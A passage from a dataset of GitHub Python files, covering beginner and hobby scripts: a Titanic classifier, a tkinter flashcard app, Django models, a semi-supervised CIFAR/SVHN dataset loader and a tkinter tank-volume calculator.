inplace=True)\ntest_df['Fare'].fillna(test_df['Fare'].mean(), inplace=True)\n\n# Feature engineering\ntrain_df['Title'] = train_df['Name'].apply(lambda x: x.split(',')[1].split('.')[0].strip())\ntest_df['Title'] = test_df['Name'].apply(lambda x: x.split(',')[1].split('.')[0].strip())\ntrain_df['Title'].replace(['Dr', 'Rev', 'Col', 'Major', 'Jonkheer', 'Capt'], 'Rare', inplace=True)\ntrain_df['Title'].replace(['Ms', 'Mlle'], 'Miss', inplace=True)\ntest_df['Title'].replace(['Dr', 'Rev', 'Col', 'Major', 'Jonkheer', 'Capt'], 'Rare', inplace=True)\ntest_df['Title'].replace(['Ms', 'Mlle'], 'Miss', inplace=True)\n\n# Select the relevant features and target variable\nX_train = train_df[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked', 'Title']]\ny_train = train_df['Survived']\nX_test = test_df[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked', 'Title']]\n\n# One-hot encode the categorical features\nX_train = pd.get_dummies(X_train)\nX_test = pd.get_dummies(X_test)\n\n# Create a random forest classifier and fit it on the training data\nrf = RandomForestClassifier(n_estimators=100, random_state=42)\nrf.fit(X_train, y_train)\n\n# Use the trained model to make predictions on the test data\ny_pred = rf.predict(X_test)\n\n# Save the predictions in a CSV file\nsubmission_df = 
pd.DataFrame({'PassengerId': test_df['PassengerId'], 'Survived': y_pred})\nsubmission_df.to_csv('submission.csv', index=False)\n","repo_name":"jm0rt1/value-investing-data-mining","sub_path":"docs/examples/obselete/predicting_titanic_survival.py","file_name":"predicting_titanic_survival.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42298973567","text":"BACKGROUND_COLOR = \"#B1DDC6\"\n\nfrom tkinter import *\nimport pandas\nimport random\n\ncurrent_card = {}\ndata_dict = {}\n\ntry:\n data = pandas.read_csv('data/words_to_learn.csv')\nexcept FileNotFoundError:\n original_data = pandas.read_csv('data/french_words.csv')\n data_dict = original_data.to_dict(orient=\"records\")\nelse:\n data_dict = data.to_dict(orient=\"records\")\n\n\n\ndef next_card():\n global current_card, flip_timer\n window.after_cancel(flip_timer)\n current_card = random.choice(data_dict)\n canvas.itemconfig(language, text=\"French\", fill=\"black\")\n canvas.itemconfig(question, text=current_card[\"French\"], fill=\"black\")\n canvas.itemconfig(canvas_image, image=front_img)\n flip_timer = window.after(3000, flip_card)\n\n\ndef flip_card():\n canvas.itemconfig(canvas_image, image=back_img)\n canvas.itemconfig(language, text=\"English\", fill=\"white\")\n canvas.itemconfig(question, text=current_card[\"English\"], fill=\"white\")\n\n\ndef is_known():\n data_dict.remove(current_card)\n data = pandas.DataFrame(data_dict)\n data.to_csv(\"data/words_to_learn.csv\", index=False)\n next_card()\n\n\nwindow = Tk()\nwindow.title(\"Flashy\")\nwindow.config(bg=BACKGROUND_COLOR, padx=50, pady=50)\n\nflip_timer = window.after(3000, flip_card)\n\ncanvas = Canvas(width=800, height=526, highlightthickness=0, bg=BACKGROUND_COLOR)\nback_img = PhotoImage(file=\"images/card_back.png\")\nfront_img = PhotoImage(file=\"images/card_front.png\")\ncanvas_image = canvas.create_image(400, 263, image=front_img)\n\nlanguage = canvas.create_text(400, 150, text=\"French\", font=(\"Arial\", 40, \"italic\"))\nquestion = canvas.create_text(400, 283, text=\"SubTitle\", font=(\"Arial\", 60, \"italic\"))\ncanvas.grid(column=0, row=0, columnspan=2)\n\n\nwrong_img = PhotoImage(file=\"images/wrong.png\")\nwrong_button = Button(image=wrong_img, highlightthickness=0, command=next_card)\nwrong_button.grid(column=0, row=1)\n\nright_img = PhotoImage(file=\"images/right.png\")\nright_button = Button(image=right_img, highlightthickness=0, command=is_known)\nright_button.grid(column=1, row=1)\n\nnext_card()\n\nwindow.mainloop()\n\n","repo_name":"NilGamer/flash_card_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22862660976","text":"with open('day9/data.txt') as f:\n data = f.readlines()\n\nfor i in range(len(data)-1):\n data[i] = int(data[i][:-1])\n\ndata[len(data)-1] = int(data[len(data)-1])\n\n\nfor i in range(25,len(data)):\n start = i - 25\n end = i - 1\n to_parse = sorted(data[start:end+1])\n lo = 0\n hi = len(to_parse)-1\n while lo <= hi:\n if lo == hi:\n print(data[i])\n break\n else:\n if to_parse[lo]+ to_parse[hi] < data[i]:\n lo+=1\n #print(lo)\n elif to_parse[lo] + to_parse[hi] > data[i]:\n hi-=1\n #print(hi)\n else:\n break\n \n 
\n","repo_name":"nguyenethan01/advent2020","sub_path":"day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34737163056","text":"from django.db import models\n\n\nclass AnoContabil(models.Model):\n '''\n A classe AnoContabil serve para registrarmos os anos contábeis.\n Além de fazer as implementações relacionadas a um único ano contábil.\n '''\n\n nome = models.CharField(\n verbose_name='Nome',\n max_length=100\n )\n\n data_inicial = models.DateField(\n verbose_name='Data inicial'\n )\n\n data_final = models.DateField(\n verbose_name='Data final'\n )\n\n aberto = models.BooleanField(\n verbose_name='Aberto?',\n default=False\n )\n\n def __str__(self):\n return self.nome\n\n class Meta:\n app_label = 'financeiro'\n verbose_name = 'Ano contábil'\n verbose_name_plural = 'Anos contábeis'\n","repo_name":"TimeNovaData/app_financeiro","sub_path":"models/ano_contabil.py","file_name":"ano_contabil.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19096375842","text":"class Solution:\n def largestNumber(self, nums: List[int]) -> str:\n for i,n in enumerate(nums):\n nums[i]=str(n)\n def compare(n1,n2):\n if n1+n2>n2+n1:\n return -1\n else:\n return 1\n nums=sorted(nums,key=cmp_to_key(compare))\n #[0,0,0]=\"000\" must be retured as \"0\" so to do this first we convert it to int then to string\n return str(int(\"\".join(nums)))\n \n \n ","repo_name":"kalebwondimu33/LeetcodeSolutions","sub_path":"0179-largest-number/0179-largest-number.py","file_name":"0179-largest-number.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8616776099","text":"from django.core.management.base import BaseCommand\nfrom rooms import models as room_models\n\n\nclass Command(BaseCommand):\n\n help = \"This command creates houserules\"\n # def add_arguments(self, parser):\n # parser.add_argument(\"--times\", help=\"how many times\")\n\n def handle(self, *args, **options):\n houserules = [\n \"키패드로 셀프 체크인\",\n \"열쇠 보관함으로 체크인\",\n \"안내 직원(으)로 셀프 체크인\",\n \"흡연 금지\",\n \"반려동물 동반 불가\",\n \"어린이와 유아에게 적합하지 않음\",\n \"파티 또는 이벤트 금지\",\n ]\n\n for r in houserules:\n room_models.HouseRule.objects.create(name=r)\n\n self.stdout.write(self.style.SUCCESS(\"Houserules Created\"))","repo_name":"GisangLee/fullstack_practice","sub_path":"rooms/management/commands/seed_houserules.py","file_name":"seed_houserules.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34402295712","text":"\nfrom sqlalchemy import Column, Index\nfrom sqlalchemy import String, Integer, Date, DateTime, Float, Numeric, ForeignKey\nfrom sqlalchemy.types import ARRAY, JSON\nfrom sqlalchemy import and_, or_\nfrom sqlalchemy.dialects.postgresql import UUID\n\nfrom sqlalchemy.orm import relationship, backref\n\nfrom openapi_server.models.attr import Attr as AttrApi\n\nfrom backbone_server.model.mixins import Base\nfrom backbone_server.model.study import Study\n\nclass Attr(Base):\n\n\n study_id = Column('study_id',\n UUID(as_uuid=True),\n ForeignKey('study.id'))\n attr_type = Column(String(256), index=True)\n attr_value_str = Column(String(256), index=True)\n attr_value_int = Column(Integer, index=True)\n attr_value_float = Column(Float, 
index=True)\n attr_value_decimal = Column(Numeric, index=True)\n attr_value_date = Column(Date, index=True)\n attr_value_datetime = Column(DateTime, index=True)\n attr_value_list_int = Column(ARRAY(Integer))\n attr_value_object = Column(JSON)\n attr_source = Column(String(256))\n\n study = relationship('Study',\n backref=backref('attr'))\n\n openapi_class = AttrApi\n\n def submapped_items(self):\n return {\n 'study_name': 'study.name',\n }\n\n @staticmethod\n def get_query(db, api_attr, value_type=None, user=None):\n\n study_id = None\n if not api_attr.attr_value:\n return None\n if value_type:\n value_type = 'attr_value_' + value_type\n else:\n value_type = 'attr_value_' + type(api_attr.attr_value).__name__\n if value_type == 'attr_value_list':\n value_type = value_type + '_' + type(api_attr.attr_value[0]).__name__\n if isinstance(api_attr.attr_value, str):\n import urllib\n api_attr.attr_value = urllib.parse.unquote_plus(api_attr.attr_value)\n\n attr_query = db.query(Attr).filter(and_(Attr.attr_type == api_attr.attr_type,\n Attr.__table__.c[value_type] == api_attr.attr_value))\n if api_attr.attr_source:\n attr_query = attr_query.filter(or_(Attr.attr_source == api_attr.attr_source, Attr.attr_source == None))\n if api_attr.study_name:\n study = Study.get_or_create_study(db, api_attr.study_name, user)\n study_id = study.id\n attr_query = attr_query.filter(or_(Attr.study_id == study_id, Attr.study_id == None))\n\n return attr_query\n\n @staticmethod\n def get(db, api_attr, value_type=None, user=None):\n\n query = Attr.get_query(db, api_attr, value_type, user=user)\n\n if query:\n return query.first()\n return None\n\n @staticmethod\n def get_or_create(db, api_attr, value_type=None, user=None):\n\n attr = Attr.get(db, api_attr, value_type, user=user)\n\n if attr is None:\n study_id = None\n if api_attr.study_name:\n study = Study.get_or_create_study(db, api_attr.study_name, user)\n study_id = study.id\n attr = Attr(attr_type=api_attr.attr_type,\n attr_source=api_attr.attr_source,\n study_id=study_id)\n if not value_type:\n value_type = 'attr_value_' + type(api_attr.attr_value).__name__\n setattr(attr, value_type, api_attr.attr_value)\n db.add(attr)\n db.commit()\n attr = Attr.get(db, api_attr)\n\n return attr\n\n @staticmethod\n def get_all(db, api_attr, value_type=None, user=None):\n\n\n query = Attr.get_query(db, api_attr, value_type, user=user)\n\n if not query:\n return\n\n for attr in query.all():\n yield attr\n\n study = relationship(\"Study\")\n def __repr__(self):\n return f''''''\n\nIndex('idx_attr_index', Attr.attr_type, Attr.attr_value_str)\n","repo_name":"malariagen/sims-backbone","sub_path":"server/backbone_server/model/attr.py","file_name":"attr.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34943469917","text":"# coding=utf-8\ndef fibo(n):\n a, b = 0, 1\n while b < n:\n print(b)\n a, b = b, a + b\n print\n\n\ndef fibo2(n):\n result = []\n a, b = 0, 1\n while b < n:\n result.append(b)\n a, b = b, a + b\n return result\n\n\n'''\n一个模块被另一个模块第一次引入 的时候,其主程序将被执行。如果我们想在模块被引入时,模块中的某一个程序块不执行,这时候可以用__name__来使\n该程序仅在自身模块运行时执行。\n每一个模块都有一个__name__属性,当其值是'__main__'时,表明该模块自身在运行,否则是其他模块在引入。\n'''\nif __name__ == '__main__':\n print(\"程序自身运行\")\nelse:\n print(\"我来子另一模块\")\n","repo_name":"zoushiqing/python","sub_path":"基础/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"72994202407","text":"print(\"PygLatin\")\r\n\r\npyg = \"ay\"\r\nasli = input(\"Enter any word: \")\r\nif len(asli) > 0 and asli.isalpha():\r\n word = asli.lower()\r\n first = word[0]\r\n new_word = word[1:]\r\n new_word = new_word + first + pyg\r\n print(new_word)\r\nelse:\r\n print(u\"آپ نے کوئي لفظ درج نہيں کيا ہے۔\")\r\n","repo_name":"yethrosh/Python","sub_path":"PygLatin.py","file_name":"PygLatin.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13553716958","text":"import pandas as pd\r\ndf= pd.read_csv(\"internship_prediction_based.csv\")\r\n\r\nX = df.iloc[:, [2, 3]].values\r\ny = df.iloc[:, 4].values\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test=train_test_split(X,y,\r\n test_size=.25,random_state=42)\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nms=MinMaxScaler()\r\nx_train=ms.fit_transform(x_train)\r\nx_test=ms.transform(x_test)\r\n\r\nfrom sklearn.svm import SVC\r\nmodel=SVC(kernel='linear',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Linear Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nmodel=SVC(kernel='rbf',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"RBF Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nmodel=SVC(kernel='poly',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Poly Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nmodel=SVC(kernel='sigmoid',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Sigmoid Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nfrom sklearn.naive_bayes import GaussianNB\r\ngb=GaussianNB()\r\ngb.fit(x_train,y_train)\r\ny_pred=gb.predict(x_test)\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"NB accuracy=\",accuracy_score(y_test,y_pred))","repo_name":"Bose-info/internship_prediction_based-ML-project","sub_path":"internship_prediction_based.py","file_name":"internship_prediction_based.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34177411652","text":"from torchvision.datasets import CIFAR10, CIFAR100, SVHN\nfrom torch.utils.data import Sampler, Dataset\nfrom torchvision import transforms\nimport torch\nimport numpy as np\n\nimport os\nimport pickle\nimport pdb\n\nimport logging\n\nfrom hashlib import md5\n\nDATASETS = ['cifar10', 'svhn']\n\n\nclass SemiSupervisedDataset(Dataset):\n def __init__(self,\n base_dataset='cifar10',\n downsample=1,\n take_fraction=None,\n take_amount_seed=1,\n semisupervised=False,\n sup_labels=None,\n unsup_labels=None,\n test_labels=None,\n add_cifar100=False,\n add_svhn_extra=False,\n aux_data_filename=None,\n aux_targets_filename=None,\n add_aux_labels=False,\n aux_take_amount=None,\n aux_label_noise=None,\n train=False,\n **kwargs):\n\n if base_dataset == 'cifar10':\n self.dataset = CIFAR10(train=train, **kwargs)\n elif base_dataset == 'svhn':\n if train:\n self.dataset = SVHN(split='train', **kwargs)\n else:\n self.dataset = SVHN(split='test', **kwargs)\n # because torchvision is annoying\n self.dataset.targets = self.dataset.labels\n self.targets = 
list(self.targets)\n\n if train and add_svhn_extra:\n svhn_extra = SVHN(split='extra', **kwargs)\n self.data = np.concatenate([self.data, svhn_extra.data])\n self.targets.extend(svhn_extra.labels)\n else:\n raise ValueError('Dataset %s not supported' % base_dataset)\n self.base_dataset = base_dataset\n self.train = train\n self.transform = self.dataset.transform\n\n if self.train:\n # Collecting subset of train data with relevant labels\n if sup_labels is not None:\n self.sup_indices = [i for (i, label) in enumerate(self.targets)\n if label in sup_labels]\n else:\n self.sup_indices = np.arange(len(self.targets))\n sup_labels = range(max(self.targets) + 1)\n\n # Collecting subset of train data with relevant labels\n if unsup_labels is not None:\n self.unsup_indices = [i for (i, label) in\n enumerate(self.targets)\n if label in unsup_labels]\n else:\n self.unsup_indices = np.arange(len(self.targets))\n\n self.sup_indices = self.sup_indices[::downsample]\n if take_fraction is not None:\n rng_state = np.random.get_state()\n np.random.seed(take_amount_seed)\n take_inds = np.random.choice(len(self.sup_indices),\n int(take_fraction*len(self.sup_indices)),\n replace=False)\n np.random.set_state(rng_state)\n\n logger = logging.getLogger()\n logger.info('Randomly taking only %d/%d examples from training'\n ' set, seed=%d, indices=%s',\n take_fraction*len(self.sup_indices), len(self.sup_indices),\n take_amount_seed, take_inds)\n self.sup_indices = self.sup_indices[take_inds]\n\n self.unsup_indices = list(set(self.unsup_indices)\n - set(self.sup_indices))\n\n if semisupervised:\n labeled = [self.targets[i] for i in self.sup_indices]\n labeled = [sup_labels.index(i) for i in labeled]\n unlabeled = [-1] * len(self.unsup_indices)\n self.targets = labeled + unlabeled\n self.data = np.concatenate((self.data[self.sup_indices],\n self.data[self.unsup_indices]),\n axis=0)\n self.sup_indices = list(range(len(self.sup_indices)))\n self.unsup_indices = list(\n range(len(self.sup_indices),\n len(self.sup_indices)+len(self.unsup_indices)))\n # self.train_labels = [\n # label if i % downsample == 0 else -1\n # for (i, label) in enumerate(self.train_labels)]\n else:\n self.all_targets = np.copy(self.targets)\n self.all_data = np.copy(self.data)\n self.targets = [self.targets[i] for i in self.sup_indices]\n self.targets = [sup_labels.index(i) for i in self.targets]\n self.data = self.data[self.sup_indices, ...]\n self.sup_indices = list(range(len(self.sup_indices)))\n\n self.orig_len = len(self.data)\n if add_cifar100:\n orig_len = len(self.data)\n cifar100 = CIFAR100(**kwargs)\n self.data = np.concatenate((self.data, cifar100.data), axis=0)\n self.targets.extend([-1] * len(cifar100.targets))\n self.unsup_indices.extend(\n range(orig_len, orig_len + len(cifar100)))\n\n if aux_data_filename is not None:\n aux_path = os.path.join(kwargs['root'], aux_data_filename)\n print(\"Loading data from %s\" % aux_path)\n with open(aux_path, 'rb') as f:\n aux = pickle.load(f)\n aux_data = aux['data']\n aux_targets = aux['extrapolated_targets']\n orig_len = len(self.data)\n\n if aux_take_amount is not None:\n rng_state = np.random.get_state()\n np.random.seed(take_amount_seed)\n take_inds = np.random.choice(len(aux_data),\n aux_take_amount, replace=False)\n np.random.set_state(rng_state)\n\n logger = logging.getLogger()\n logger.info(\n 'Randomly taking only %d/%d examples from aux data'\n ' set, seed=%d, indices=%s',\n aux_take_amount, len(aux_data),\n take_amount_seed, take_inds)\n aux_data = aux_data[take_inds]\n aux_targets = 
aux_targets[take_inds]\n\n if not add_aux_labels:\n self.targets.extend([-1] * len(aux_data))\n else:\n if aux_targets_filename is not None:\n aux_path = aux_targets_filename\n print(\"Loading data from %s\" % aux_path)\n with open(aux_path, 'rb') as f:\n aux = pickle.load(f)\n new_aux_targets = aux['extrapolated_targets']\n n = len(aux_targets)\n print('Difference between new and old extrapolated targets = %.3g%%' %\n (100 * (aux_targets != new_aux_targets[:n]).mean()))\n\n if (len(new_aux_targets) > len(aux_targets)):\n assert(len(new_aux_targets) - len(aux_targets) == len(self.unsup_indices))\n true_labels = [self.all_targets[i] for i in self.unsup_indices]\n print('Difference between extrapolated and true labels on training set = %.3g%%' %\n (100 * (true_labels != new_aux_targets[n:]).mean()))\n logging.info('Adding unsupervised %d examples from training data' %(len(self.unsup_indices)))\n unlabeled_data = self.all_data[self.unsup_indices]\n # Since new targets are now included\n self.unsup_indices = []\n aux_data = np.concatenate((aux_data, unlabeled_data), axis=0)\n aux_targets = new_aux_targets\n\n else:\n self.unsup_indices=[]\n if aux_label_noise:\n num_aux = len(aux_targets)\n num_to_noise = int(num_aux * aux_label_noise)\n logging.info('Making %d/%d aux labels noisy, '\n 'numpy rng state MD5=%s' %\n (num_to_noise, num_aux,\n md5(np.random.get_state()[1]).hexdigest()\n ))\n inds_to_noise = np.random.choice(\n num_aux, num_to_noise, replace=False)\n permutated_labels = np.random.permutation(\n aux_targets[inds_to_noise])\n aux_targets[inds_to_noise] = permutated_labels\n\n self.targets.extend(aux_targets)\n self.data = np.concatenate((self.data, aux_data), axis=0)\n # note that we use unsup indices to track the labeled datapoints\n # whose labels are \"fake\"\n self.unsup_indices.extend(\n range(orig_len, orig_len+len(aux_data)))\n\n self.orig_len = orig_len\n logger = logging.getLogger()\n logger.info(\"Training set\")\n logger.info(\"Number of training samples: %d\", len(self.targets))\n logger.info(\"Number of supervised samples: %d\",\n len(self.sup_indices))\n logger.info(\"Number of unsup samples: %d\", len(self.unsup_indices))\n logger.info(\"Label histogram: %s\",\n tuple(\n zip(*np.unique(self.targets, return_counts=True))))\n logger.info(\"Shape of training data: %s\", np.shape(self.data))\n\n # Test set\n else:\n self.orig_len = len(self.data)\n if test_labels is not None:\n self.test_indices = [i for (i, label) in enumerate(self.targets)\n if label in test_labels]\n self.targets = [self.targets[i] for i in self.test_indices]\n self.targets = [test_labels.index(i) for i in self.targets]\n self.data = self.data[self.test_indices, ...]\n self.orig_len = len(self.data)\n logger = logging.getLogger()\n logger.info(\"Test set\")\n logger.info(\"Number of samples: %d\", len(self.targets))\n logger.info(\"Label histogram: %s\",\n tuple(\n zip(*np.unique(self.targets, return_counts=True))))\n logger.info(\"Shape of data: %s\", np.shape(self.data))\n\n @property\n def data(self):\n return self.dataset.data\n\n @data.setter\n def data(self, value):\n self.dataset.data = value\n\n @property\n def targets(self):\n return self.dataset.targets\n\n @targets.setter\n def targets(self, value):\n self.dataset.targets = value\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n self.dataset.labels = self.targets # because torchvision is annoying\n d = self.dataset[item]\n d = list(d)\n d.append(item >= self.orig_len)\n d = tuple(d)\n return d\n # return 
self.dataset[item]\n\n\n def __repr__(self):\n fmt_str = 'Semisupervised Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Training: {}\\n'.format(self.train)\n fmt_str += ' Root Location: {}\\n'.format(self.dataset.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.dataset.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n tmp = ' Target Transforms (if any): '\n fmt_str += '{0}{1}'.format(tmp, self.dataset.target_transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str\n\n\nclass SemiSupervisedSampler(Sampler):\n def __init__(self, sup_inds, unsup_inds, batch_size, unsup_fraction=0.5,\n num_batches=None):\n if unsup_fraction is None or unsup_fraction < 0:\n self.sup_inds = sup_inds + unsup_inds\n unsup_fraction = 0.0\n else:\n self.sup_inds = sup_inds\n self.unsup_inds = unsup_inds\n\n self.batch_size = batch_size\n unsup_batch_size = int(batch_size * unsup_fraction)\n self.sup_batch_size = batch_size - unsup_batch_size\n\n if num_batches is not None:\n self.num_batches = num_batches\n else:\n self.num_batches = int(\n np.ceil(len(self.sup_inds) / self.sup_batch_size))\n\n\n super().__init__(None)\n\n def __iter__(self):\n batch_counter = 0\n while batch_counter < self.num_batches:\n sup_inds_shuffled = [self.sup_inds[i]\n for i in torch.randperm(len(self.sup_inds))]\n for sup_k in range(0, len(self.sup_inds), self.sup_batch_size):\n if batch_counter == self.num_batches:\n break\n batch = sup_inds_shuffled[sup_k:(sup_k + self.sup_batch_size)]\n # extending with unlabeled data\n if self.sup_batch_size < self.batch_size:\n batch.extend([self.unsup_inds[i] for i in\n torch.randint(high=len(self.unsup_inds),\n size=(\n self.batch_size - len(\n batch),),\n dtype=torch.int64)])\n\n np.random.shuffle(batch)\n yield batch\n batch_counter += 1\n\n def __len__(self):\n return self.num_batches\n","repo_name":"p-lambda/robust_tradeoff","sub_path":"cifar/code/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":14058,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"34422995266","text":"# Gerar executável para windows\n\n# pip install pyinstaller\n\n# pyinstaller --onefile tela.py --noconsole\n\nimport tela_support\nimport sys\nimport tkinter as tk\nimport tkinter.ttk as ttk\nfrom tkinter.constants import *\nimport os.path\n\n_script = sys.argv[0]\n_location = os.path.dirname(_script)\n\n\n_bgcolor = '#d9d9d9' # X11 color: 'gray85'\n_fgcolor = '#000000' # X11 color: 'black'\n_compcolor = 'gray40' # X11 color: #666666\n_ana1color = '#c3c3c3' # Closest X11 color: 'gray76'\n_ana2color = 'beige' # X11 color: #f5f5dc\n_tabfg1 = 'black'\n_tabfg2 = 'black'\n_tabbg1 = 'grey75'\n_tabbg2 = 'grey89'\n_bgmode = 'light'\n\n\nclass Toplevel1:\n\n def calcular(self):\n altura = float(self.altura.get())\n raio = float(self.diametro.get())/2\n area = round(3.14*raio**2*altura)\n self.Label3_3.configure(text='Volume: '+str(area)+\" m²\")\n\n def __init__(self, top=None):\n '''This class configures and populates the toplevel window.\n top is the toplevel containing window.'''\n\n top.geometry(\"1327x711+114+137\")\n top.minsize(120, 1)\n top.maxsize(1924, 1061)\n top.resizable(1, 1)\n top.title(\"Toplevel 0\")\n top.configure(background=\"#2e3349\")\n top.configure(highlightbackground=\"#d9d9d9\")\n top.configure(highlightcolor=\"black\")\n\n self.top = top\n self.altura = tk.StringVar()\n 
self.diametro = tk.StringVar()\n\n self.menubar = tk.Menu(top, font=\"TkMenuFont\",\n bg=_bgcolor, fg=_fgcolor)\n top.configure(menu=self.menubar)\n\n self.Label1 = tk.Label(self.top)\n self.Label1.place(relx=0.588, rely=-0.042, height=886, width=1167)\n self.Label1.configure(activebackground=\"#f9f9f9\")\n self.Label1.configure(anchor='w')\n self.Label1.configure(background=\"#2e3349\")\n self.Label1.configure(compound='left')\n self.Label1.configure(disabledforeground=\"#a3a3a3\")\n self.Label1.configure(foreground=\"#000000\")\n self.Label1.configure(highlightbackground=\"#d9d9d9\")\n self.Label1.configure(highlightcolor=\"black\")\n photo_location = os.path.join(\n _location, \"D:/GitHub/puc_minas_iot_industrial_programacao_para_desenvolvimento_iiot/aula3/imagens/tanque.png\")\n global _img0\n _img0 = tk.PhotoImage(file=photo_location)\n self.Label1.configure(image=_img0)\n\n self.Frame1 = tk.Frame(self.top)\n self.Frame1.place(relx=0.039, rely=0.239,\n relheight=0.726, relwidth=0.529)\n self.Frame1.configure(relief='groove')\n self.Frame1.configure(borderwidth=\"2\")\n self.Frame1.configure(relief=\"groove\")\n self.Frame1.configure(background=\"#252a40\")\n self.Frame1.configure(highlightbackground=\"#d9d9d9\")\n self.Frame1.configure(highlightcolor=\"black\")\n\n self.Label3 = tk.Label(self.Frame1)\n self.Label3.place(relx=0.148, rely=0.128, height=79, width=166)\n self.Label3.configure(activebackground=\"#f9f9f9\")\n self.Label3.configure(anchor='w')\n self.Label3.configure(background=\"#252a40\")\n self.Label3.configure(compound='left')\n self.Label3.configure(disabledforeground=\"#a3a3a3\")\n self.Label3.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3.configure(foreground=\"#f2f2f2\")\n self.Label3.configure(highlightbackground=\"#d9d9d9\")\n self.Label3.configure(highlightcolor=\"black\")\n self.Label3.configure(text='''Altura [m]:''')\n\n self.Button1 = tk.Button(self.Frame1)\n self.Button1.place(relx=0.252, rely=0.734, height=74, width=307)\n self.Button1.configure(activebackground=\"beige\")\n self.Button1.configure(activeforeground=\"black\")\n self.Button1.configure(background=\"#007ef9\")\n self.Button1.configure(compound='left')\n self.Button1.configure(disabledforeground=\"#a3a3a3\")\n self.Button1.configure(font=\"-family {Segoe UI} -size 28 -weight bold\")\n self.Button1.configure(foreground=\"#f2f2f2\")\n self.Button1.configure(highlightbackground=\"#d9d9d9\")\n self.Button1.configure(highlightcolor=\"black\")\n self.Button1.configure(pady=\"0\")\n self.Button1.configure(text='''Alterar''')\n\n self.Entry1 = tk.Entry(self.Frame1)\n self.Entry1.place(relx=0.415, rely=0.128, height=60, relwidth=0.348)\n self.Entry1.configure(background=\"white\")\n self.Entry1.configure(disabledforeground=\"#a3a3a3\")\n self.Entry1.configure(font=\"-family {Courier New} -size 20\")\n self.Entry1.configure(foreground=\"#000000\")\n self.Entry1.configure(highlightbackground=\"#d9d9d9\")\n self.Entry1.configure(highlightcolor=\"black\")\n self.Entry1.configure(insertbackground=\"black\")\n self.Entry1.configure(selectbackground=\"#c4c4c4\")\n self.Entry1.configure(selectforeground=\"black\")\n self.Entry1.configure(textvariable=self.altura)\n\n self.Entry2 = tk.Entry(self.Frame1)\n self.Entry2.place(relx=0.415, rely=0.388, height=60, relwidth=0.348)\n self.Entry2.configure(background=\"white\")\n self.Entry2.configure(disabledforeground=\"#a3a3a3\")\n self.Entry2.configure(font=\"-family {Courier New} -size 20\")\n self.Entry2.configure(foreground=\"#000000\")\n 
self.Entry2.configure(highlightbackground=\"#d9d9d9\")\n self.Entry2.configure(highlightcolor=\"black\")\n self.Entry2.configure(insertbackground=\"black\")\n self.Entry2.configure(selectbackground=\"#c4c4c4\")\n self.Entry2.configure(selectforeground=\"black\")\n self.Entry2.configure(textvariable=self.diametro)\n\n self.Label3_1 = tk.Label(self.Frame1)\n self.Label3_1.place(relx=0.452, rely=-0.252, height=78, width=165)\n self.Label3_1.configure(activebackground=\"#f9f9f9\")\n self.Label3_1.configure(anchor='w')\n self.Label3_1.configure(background=\"#252a40\")\n self.Label3_1.configure(compound='left')\n self.Label3_1.configure(disabledforeground=\"#a3a3a3\")\n self.Label3_1.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3_1.configure(foreground=\"#f2f2f2\")\n self.Label3_1.configure(highlightbackground=\"#d9d9d9\")\n self.Label3_1.configure(highlightcolor=\"black\")\n self.Label3_1.configure(text='''Diâmetro [m]:''')\n\n self.Label3_2 = tk.Label(self.Frame1)\n self.Label3_2.place(relx=0.145, 